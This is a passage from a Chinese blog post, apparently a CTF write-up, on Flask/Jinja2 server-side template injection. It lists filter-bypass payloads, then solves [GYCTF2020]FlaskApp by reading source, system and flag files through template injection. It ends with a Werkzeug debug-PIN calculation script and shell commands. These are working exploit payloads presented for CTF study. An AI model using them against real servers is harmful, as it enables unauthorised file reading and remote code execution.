<li><p>过滤<code>[]</code>等括号</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 使用 gititem 绕过，如原 poc：&#123;&#123; &quot;&quot;.class.bases[0] &#125;&#125;</span></span><br><span class="line">&#123;&#123; <span class="string">&quot;&quot;</span>.<span class="keyword">class</span>.bases.getitem(<span class="number">0</span>) &#125;&#125;</span><br></pre></td></tr></table></figure>
</li>
<li><p>过滤了 subclasses，拼凑法</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 原 poc：&#123;&#123; &quot;&quot;.class.bases[0].subclasses() &#125;&#125;</span></span><br><span class="line">&#123;&#123; <span class="string">&quot;&quot;</span>.<span class="keyword">class</span>.bases[<span class="number">0</span>][<span class="string">&#x27;subcla&#x27;</span>+<span class="string">&#x27;sses&#x27;</span>] &#125;&#125;</span><br></pre></td></tr></table></figure>
</li>
<li><p>过滤 class，使用 session</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">poc：&#123;&#123; session[<span class="string">&#x27;cla&#x27;</span>+<span class="string">&#x27;ss&#x27;</span>].bases[<span class="number">0</span>].bases[<span class="number">0</span>].bases[<span class="number">0</span>].bases[<span class="number">0</span>].subclasses()[<span class="number">118</span>] &#125;&#125;</span><br><span class="line"><span class="comment"># 多个 bases[0] 是因为一直在向上找 object 类，使用 mro 就会很方便</span></span><br><span class="line">&#123;&#123; session[<span class="string">&#x27;__cla&#x27;</span>+<span class="string">&#x27;ss__&#x27;</span>].__mro__[<span class="number">12</span>] &#125;&#125;</span><br><span class="line"><span class="comment"># 或者</span></span><br><span class="line">request&#123;&#123; [<span class="string">&#x27;__cl&#x27;</span>+<span class="string">&#x27;ass__&#x27;</span>].__mro__[<span class="number">12</span>] &#125;&#125;</span><br></pre></td></tr></table></figure>
</li>
<li><p>timeit 的使用</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> timeit</span><br><span class="line">timeit.timeit(<span class="string">&quot;__import__(&#x27;os&#x27;).system(&#x27;dir&#x27;)&quot;</span>,number=<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> platform</span><br><span class="line"><span class="built_in">print</span> platform.popen(<span class="string">&#x27;dir&#x27;</span>).read()</span><br></pre></td></tr></table></figure>
</li>
<li><p>其他</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">使用 attr 过滤器，对应 do_attr</span></span><br><span class="line"><span class="string">即用来获取类的属性 由 getattr 函数来实现 &#123;&#123;config|attr(&quot;__class__&quot;)&#125;&#125;</span></span><br><span class="line"><span class="string">__getitem__ 方法返回键对应值，attr 过滤器获得类属性</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line">&#123;&#123; get_flashed_messages &#125;&#125;</span><br><span class="line">&#123;&#123; url_for &#125;&#125;</span><br><span class="line">&#123;&#123;% <span class="built_in">print</span>(lipsum|attr(<span class="string">&quot;__globals__&quot;</span>))|attr(<span class="string">&quot;__getitem__&quot;</span>)(<span class="string">&quot;os&quot;</span>)|attr(<span class="string">&quot;popen&quot;</span>)(<span class="string">&quot;whoami&quot;</span>)|attr(”read“)() %&#125;&#125;</span><br></pre></td></tr></table></figure></li>
</ol>
<h3 id="一道-Flask-的-SSTI"><a href="#一道-Flask-的-SSTI" class="headerlink" title="一道 Flask 的 SSTI"></a>一道 Flask 的 SSTI</h3><h4 id="题目"><a href="#题目" class="headerlink" title="题目"></a>题目</h4><p>题目地址：<a target="_blank" rel="noopener" href="https://buuoj.cn/challenges#[GYCTF2020]FlaskApp">[GYCTF2020]FlaskApp</a></p>
<p>打开题目场景是在线的 Base64 加密和解密，使用 Flask 搭建，在尝试解密时随便输入字符就会报错，读取到一部分的源码：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/decode&#x27;</span>,methods=[<span class="string">&#x27;POST&#x27;</span>,<span class="string">&#x27;GET&#x27;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">decode</span>():</span><br><span class="line">    <span class="keyword">if</span> request.values.get(<span class="string">&#x27;text&#x27;</span>) :</span><br><span class="line">        text = request.values.get(<span class="string">&quot;text&quot;</span>)</span><br><span class="line">        text_decode = base64.b64decode(text.encode())</span><br><span class="line">        tmp = <span class="string">&quot;结果 ： &#123;0&#125;&quot;</span>.<span class="built_in">format</span>(text_decode.decode())</span><br><span class="line">        <span class="keyword">if</span> waf(tmp) :</span><br><span class="line">            flash(<span class="string">&quot;no no no !!&quot;</span>)</span><br><span class="line">            <span class="keyword">return</span> redirect(url_for(<span class="string">&#x27;decode&#x27;</span>))</span><br><span class="line">        res =  render_template_string(tmp)</span><br></pre></td></tr></table></figure>

<p>来试探下有没有 SSTI：先试了试<code>&#123;&#123;3*3&#125;&#125;</code>先编码，再在网站解码，显示<code>no no no !!</code>，结合上面的代码就知道被过滤掉了，再试了试<code>&#123;&#123;3+3&#125;&#125;</code>，解码出来是 6，证明存在 SSTI，先来读取一下 waf 的代码</p>
<h4 id="读取源码"><a href="#读取源码" class="headerlink" title="读取源码"></a>读取源码</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&#123;% <span class="keyword">for</span> c <span class="keyword">in</span> [].__class__.__base__.__subclasses__() %&#125;</span><br><span class="line">&#123;% <span class="keyword">if</span> c.__name__==<span class="string">&#x27;catch_warnings&#x27;</span> %&#125;</span><br><span class="line">&#123;&#123; c.__init__.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>].<span class="built_in">open</span>(<span class="string">&#x27;app.py&#x27;</span>,<span class="string">&#x27;r&#x27;</span>).read() &#125;&#125;</span><br><span class="line">&#123;% endif %&#125;&#123;% endfor %&#125;</span><br></pre></td></tr></table></figure>

<p>写成一行：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;% <span class="keyword">for</span> c <span class="keyword">in</span> [].__class__.__base__.__subclasses__() %&#125;&#123;% <span class="keyword">if</span> c.__name__==<span class="string">&#x27;catch_warnings&#x27;</span> %&#125;&#123;&#123; c.__init__.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>].<span class="built_in">open</span>(<span class="string">&#x27;app.py&#x27;</span>,<span class="string">&#x27;r&#x27;</span>).read() &#125;&#125;&#123;% endif %&#125;&#123;% endfor %&#125;</span><br></pre></td></tr></table></figure>

<p>加密解密读取到 waf 部分代码：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">waf</span>(<span class="params"><span class="built_in">str</span></span>): </span><br><span class="line">  black_list = [ &amp;</span><br><span class="line">    <span class="comment">#34;flag&amp;# 34;, &amp; #34;os&amp;# 34;, &amp; #34;system&amp;# 34;, &amp;</span></span><br><span class="line">    <span class="comment">#34;popen&amp;# 34;, &amp; #34;import&amp;# 34;, &amp; #34;eval&amp;# 34;, &amp;</span></span><br><span class="line">    <span class="comment">#34;chr&amp;# 34;, &amp; #34;request&amp;# 34;, &amp; #34;subprocess&amp;# 34;, &amp;</span></span><br><span class="line">    <span class="comment">#34;commands&amp;# 34;, &amp; #34;socket&amp;# 34;, &amp; #34;hex&amp;# 34;, &amp;</span></span><br><span class="line">    <span class="comment">#34;base64&amp;# 34;, &amp; #34;*&amp;# 34;, &amp; #34;?&amp;# 34;</span></span><br><span class="line">]</span><br><span class="line">  <span class="keyword">for</span> x <span class="keyword">in</span> black_list: </span><br><span class="line">    <span class="keyword">if</span> x <span class="keyword">in</span> <span class="built_in">str</span>.lower(): </span><br><span class="line">      <span class="keyword">return</span> <span class="number">1</span>@ app.route( &amp;<span class="comment">#39;/hint&amp;# 39;, methods = [ &amp; #39;GET&amp;# 39;])</span></span><br></pre></td></tr></table></figure>

<h4 id="字符串拼接绕过"><a href="#字符串拼接绕过" class="headerlink" title="字符串拼接绕过"></a>字符串拼接绕过</h4><p>从 black_list 得知了过滤的关键字，因为有 lower 方法，所以不能进行大小写、base64、hex 等方法进行绕过</p>
<p>先来读取下目录文件：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;% <span class="keyword">for</span> c <span class="keyword">in</span> [].__class__.__base__.__subclasses__() %&#125;&#123;% <span class="keyword">if</span> c.__name__==<span class="string">&#x27;catch_warnings&#x27;</span> %&#125;&#123;&#123; c.__init__.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>][<span class="string">&#x27;__imp&#x27;</span>+<span class="string">&#x27;ort__&#x27;</span>](<span class="string">&#x27;o&#x27;</span>+<span class="string">&#x27;s&#x27;</span>).listdir(<span class="string">&#x27;/&#x27;</span>)&#125;&#125;&#123;% endif %&#125;&#123;% endfor %&#125;</span><br></pre></td></tr></table></figure>

<p>编码解码，看到了<code>this_is_the_flag.txt</code>，直接来读取：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;% <span class="keyword">for</span> c <span class="keyword">in</span> [].__class__.__base__.__subclasses__() %&#125;&#123;% <span class="keyword">if</span> c.__name__==<span class="string">&#x27;catch_warnings&#x27;</span> %&#125;&#123;&#123; c.__init__.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>].<span class="built_in">open</span>(<span class="string">&#x27;/this_is_the_fl&#x27;</span>+<span class="string">&#x27;ag.txt&#x27;</span>,<span class="string">&#x27;r&#x27;</span>).read()&#125;&#125;&#123;% endif %&#125;&#123;% endfor %&#125;</span><br></pre></td></tr></table></figure>

<p>编码解码得到 flag，还可以不使用字符串拼接来绕过，使用倒序输出来绕过（’xxx’[::-1]）：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;% <span class="keyword">for</span> c <span class="keyword">in</span> [].__class__.__base__.__subclasses__() %&#125;&#123;% <span class="keyword">if</span> c.__name__==<span class="string">&#x27;catch_warnings&#x27;</span> %&#125;&#123;&#123; c.__init__.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>].<span class="built_in">open</span>(<span class="string">&#x27;txt.galf_eht_si_siht/&#x27;</span>[::-<span class="number">1</span>],<span class="string">&#x27;r&#x27;</span>).read()&#125;&#125;&#123;% endif %&#125;&#123;% endfor %&#125;</span><br></pre></td></tr></table></figure>

<p>同样编码解码得到 flag</p>
<h4 id="利用-PIN-码-RCE"><a href="#利用-PIN-码-RCE" class="headerlink" title="利用 PIN 码 RCE"></a>利用 PIN 码 RCE</h4><p>通过 PIN 码生成机制可知，需要获取如下信息</p>
<ol>
<li>服务器运行 flask 所登录的用户名。通过<code>/etc/passwd</code>中可以猜测为 flaskweb 或者 root，此处用的 flaskweb</li>
<li>modname，一般不变就是<code>flask.app</code></li>
<li><code>getattr(app, &quot;__name__&quot;, app.__class__.__name__)</code>，python 该值一般为 Flask，该值一般不变</li>
<li>flask 库下<code>app.py</code>的绝对路径。报错信息会泄露该值。题中为<code>/usr/local/lib/python3.7/site-packages/flask/app.py</code><br>当前网络的 mac 地址的十进制数。通过文件<code>/sys/class/net/eth0/address</code>获取（eth0 为网卡名）</li>
<li>机器的 id：对于非 docker 机每一个机器都会有自已唯一的 id<br>Linux：<code>/etc/machine-id</code>或<code>/proc/sys/kernel/random/boot_i</code>，有的系统没有这两个文件<br>Windows：见链接 <a target="_blank" rel="noopener" href="https://www.cnblogs.com/HacTF/p/8160076.html">Flask debug 模式 PIN 码生成机制安全性研究笔记</a><br>docker：<code>/proc/self/cgroup</code></li>
</ol>
<p>首先获取 MAC 地址：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;% <span class="keyword">for</span> c <span class="keyword">in</span> [].__class__.__base__.__subclasses__() %&#125;&#123;% <span class="keyword">if</span> c.__name__==<span class="string">&#x27;catch_warnings&#x27;</span> %&#125;&#123;&#123; c.__init__.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>].<span class="built_in">open</span>(<span class="string">&#x27;/sys/class/net/eth0/address&#x27;</span>,<span class="string">&#x27;r&#x27;</span>).read() &#125;&#125;&#123;% endif %&#125;&#123;% endfor %&#125;</span><br></pre></td></tr></table></figure>

<p>得到：<code> 02:72:a1:0c:bb:7a</code>再转换为十进制：<code>2691351493498</code>，然后获取机器 id，读取<code>/proc/self/cgroup</code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;% <span class="keyword">for</span> c <span class="keyword">in</span> [].__class__.__base__.__subclasses__() %&#125;&#123;% <span class="keyword">if</span> c.__name__==<span class="string">&#x27;catch_warnings&#x27;</span> %&#125;&#123;&#123; c.__init__.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>].<span class="built_in">open</span>(<span class="string">&#x27;/etc/machine-id&#x27;</span>,<span class="string">&#x27;r&#x27;</span>).read() &#125;&#125;&#123;% endif %&#125;&#123;% endfor %&#125;</span><br></pre></td></tr></table></figure>

<p>得到（最开始读取的是<code>/proc/self/cgroup</code>发现后面计算出来的 PIN 一直是错的，换成了<code>/etc/machine-id</code>读出来计算的 PIN 是对的）：</p>
<figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1408f836b0ca514d796cbf8960e45fa1</span><br></pre></td></tr></table></figure>

<p>计算 PIN 的脚本：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line"><span class="keyword">from</span> itertools <span class="keyword">import</span> chain</span><br><span class="line"></span><br><span class="line">probably_public_bits = [</span><br><span class="line">    <span class="comment"># username</span></span><br><span class="line">    <span class="string">&#x27;flaskweb&#x27;</span>,</span><br><span class="line">    <span class="comment"># modname</span></span><br><span class="line">    <span class="string">&#x27;flask.app&#x27;</span>,</span><br><span class="line">    <span class="comment"># getattr(app, &#x27;__name__&#x27;, getattr(app.__class__, &#x27;__name__&#x27;))</span></span><br><span class="line">    <span class="string">&#x27;Flask&#x27;</span>,</span><br><span class="line">    <span class="comment"># getattr(mod, &#x27;__file__&#x27;, None)</span></span><br><span class="line">    <span class="string">&#x27;/usr/local/lib/python3.7/site-packages/flask/app.py&#x27;</span></span><br><span class="line">]</span><br><span class="line"></span><br><span class="line">private_bits = [</span><br><span class="line">    <span class="comment"># str(uuid.getnode()), /sys/class/net/ens33/address</span></span><br><span class="line">    <span class="string">&#x27;2691351493498&#x27;</span>,</span><br><span class="line">    <span class="comment"># get_machine_id(), /etc/machine-id</span></span><br><span class="line">    <span class="string">&#x27;1408f836b0ca514d796cbf8960e45fa1&#x27;</span></span><br><span class="line">]</span><br><span class="line"></span><br><span class="line">h = hashlib.md5()</span><br><span class="line"><span class="keyword">for</span> bit <span class="keyword">in</span> chain(probably_public_bits, private_bits):</span><br><span class="line">    <span class="keyword">if</span> <span class="keyword">not</span> bit:</span><br><span class="line">        <span class="keyword">continue</span></span><br><span class="line">    <span class="keyword">if</span> <span class="built_in">isinstance</span>(bit, <span class="built_in">str</span>):</span><br><span class="line">        bit = bit.encode(<span class="string">&#x27;utf-8&#x27;</span>)</span><br><span class="line">    h.update(bit)</span><br><span class="line">h.update(<span class="string">b&#x27;cookiesalt&#x27;</span>)</span><br><span class="line"> </span><br><span class="line">cookie_name = <span class="string">&#x27;__wzd&#x27;</span> + h.hexdigest()[:<span class="number">20</span>]</span><br><span class="line"> </span><br><span class="line">num = <span class="literal">None</span></span><br><span class="line"><span class="keyword">if</span> num <span class="keyword">is</span> <span class="literal">None</span>:</span><br><span class="line">    h.update(<span class="string">b&#x27;pinsalt&#x27;</span>)</span><br><span class="line">    num = (<span class="string">&#x27;%09d&#x27;</span> % <span class="built_in">int</span>(h.hexdigest(), <span class="number">16</span>))[:<span class="number">9</span>]</span><br><span class="line"> </span><br><span class="line">rv = <span class="literal">None</span></span><br><span class="line"><span class="keyword">if</span> rv <span class="keyword">is</span> <span class="literal">None</span>:</span><br><span class="line">    <span class="keyword">for</span> group_size <span class="keyword">in</span> <span class="number">5</span>, <span class="number">4</span>, <span class="number">3</span>:</span><br><span class="line">        <span class="keyword">if</span> <span class="built_in">len</span>(num) % group_size == <span class="number">0</span>:</span><br><span class="line">            rv = <span class="string">&#x27;-&#x27;</span>.join(num[x:x + group_size].rjust(group_size, <span class="string">&#x27;0&#x27;</span>)</span><br><span class="line">                          <span class="keyword">for</span> x <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="built_in">len</span>(num), group_size))</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        rv = num</span><br><span class="line"> </span><br><span class="line"><span class="built_in">print</span>(rv)</span><br></pre></td></tr></table></figure>

<p>得到：<code>104-593-296</code>，在解码报错页面输入，获得交互式的 Shell，读取 flag</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">import os</span><br><span class="line">os.popen(&quot;ls -l /&quot;).read()</span><br><span class="line">os.popen(&quot;cat /this_is_the_flag.txt&quot;).read()</span><br></pre></td></tr></table></figure>

<hr>
<p>本文参考链接：</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/kylinxjd/article/details/94563427">Jinja2常用模板语言</a></p>
<p><a target="_blank" rel="noopener" href="https://www.freebuf.com/column/187845.html">从零学习flask模板注入</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/alexhcf/article/details/108400293">GYCTF2020 FlaskApp</a></p>
<p><a target="_blank" rel="noopener" href="https://seizer.top/post/2021-10/Flask%E6%A1%86%E6%9E%B6%E5%8F%8A%E5%85%B6%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0/">Flask 框架及其漏洞学习</a></p>
<p><a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/32138231">Flask开启debug模式等于给黑客留了后门</a></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/HacTF/p/8160076.html">Flask debug 模式 PIN 码生成机制安全性研究笔记</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/kylinxjd/article/details/94563427">Jinja2常用模板语言（条件判断if，循环遍历for，过滤器）</a></p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/CTF/" rel="tag"># CTF</a>
              <a href="/tags/Flask/" rel="tag"># Flask</a>
              <a href="/tags/SSTI/" rel="tag"># SSTI</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2022/04/24/%E4%B8%80%E9%81%93%E7%AE%80%E5%8D%95%E7%9A%84-PHP-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" rel="prev" title="一道简单的 PHP 反序列化">
                  <i class="fa fa-angle-left"></i> 一道简单的 PHP 反序列化
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2022/05/28/Flask-%E7%9A%84-SESSION-%E4%BC%AA%E9%80%A0/" rel="next" title="Flask 的 SESSION 伪造">
                  Flask 的 SESSION 伪造 <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 2022 – 
    <span itemprop="copyrightYear">2026</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">Paoka1</span>
  </div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>

</body>
</html>
